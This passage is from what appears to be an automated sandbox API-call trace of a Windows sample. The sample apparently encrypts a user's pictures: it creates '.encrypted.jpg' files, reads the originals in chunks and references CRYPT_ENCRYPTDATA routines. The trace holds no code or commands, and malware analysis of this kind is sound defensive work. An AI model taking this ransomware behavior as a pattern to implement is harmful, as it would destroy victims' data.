hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0040.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0040.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0040.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0040.088] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0040.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0040.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0040.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0040.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0040.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0040.088] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0040.088] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0040.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0040.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0040.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0040.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0040.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0040.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0040.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0040.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0040.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0040.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0040.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0040.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0040.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0040.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0040.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0040.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0040.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0040.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0040.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0040.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0040.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0040.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0040.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0040.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0040.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0040.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xf0) returned 0x7c9798 [0040.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0040.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c5810 [0040.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0040.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c55e8 [0040.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c9798 | out: hHeap=0x770000) returned 1 [0040.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0040.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0040.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0040.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0040.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5810 | out: hHeap=0x770000) returned 1 [0040.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0040.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0040.089] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c5810 [0040.089] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\a-rptl9rgzl\\eqssafks-mgdt6pjw")) returned 0x10 [0040.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5810 | out: hHeap=0x770000) returned 1 [0040.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c55e8 | out: hHeap=0x770000) returned 1 [0040.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0040.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0040.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0040.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0040.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0040.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0040.090] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.encrypted.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\a-rptl9rgzl\\eqssafks-mgdt6pjw\\zfzfoo26_z1.encrypted.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0040.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0040.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0040.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0040.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0040.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0040.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0040.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0040.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0040.091] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0040.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0040.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0040.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0040.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0040.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0040.091] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0040.091] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0040.091] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0040.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0040.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0040.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0040.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0040.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0040.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0040.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0040.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0040.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0040.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0040.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0040.091] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0040.092] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0040.092] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0xdda0, lpOverlapped=0x0) returned 1 [0040.094] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0040.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0040.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0040.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0040.094] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xdda0) returned 0xac2018 [0040.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0040.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0040.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0040.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0040.095] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0040.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0040.095] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xdda0) returned 0xacfdc0 [0040.096] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0040.096] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.096] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0040.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0040.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0040.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0040.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0040.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xdda0) returned 0xac2018 [0040.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0040.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0040.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0040.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.097] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0040.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0040.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0040.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0040.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0040.098] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0040.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0040.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0040.098] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0040.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0040.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da258 [0040.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0040.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0040.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0040.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0040.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xdda0) returned 0xac2018 [0040.098] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1d8 [0040.098] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0040.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0040.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0040.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da318 [0040.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0040.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0040.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0040.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da178 [0040.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0040.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0040.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0040.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889610 [0040.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0040.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0040.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0040.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0040.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0040.099] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xdda0) returned 0x935008 [0040.100] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0040.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0040.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0040.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0040.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0040.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0040.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0040.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0040.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0040.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0040.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0040.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0040.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0040.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0040.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0040.101] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0040.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0040.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0040.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0040.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0040.101] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0040.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0040.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0040.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0040.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0040.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0040.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0040.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0040.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0040.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0040.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0040.101] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0040.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0040.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0040.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0040.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da208 [0040.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0040.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0040.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0040.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0040.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cee0 [0040.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0040.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0040.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0040.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0040.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0040.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0040.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0040.102] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0040.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0040.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0040.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0040.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0040.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0040.102] HeapFree (in: hHeap=0x770000, 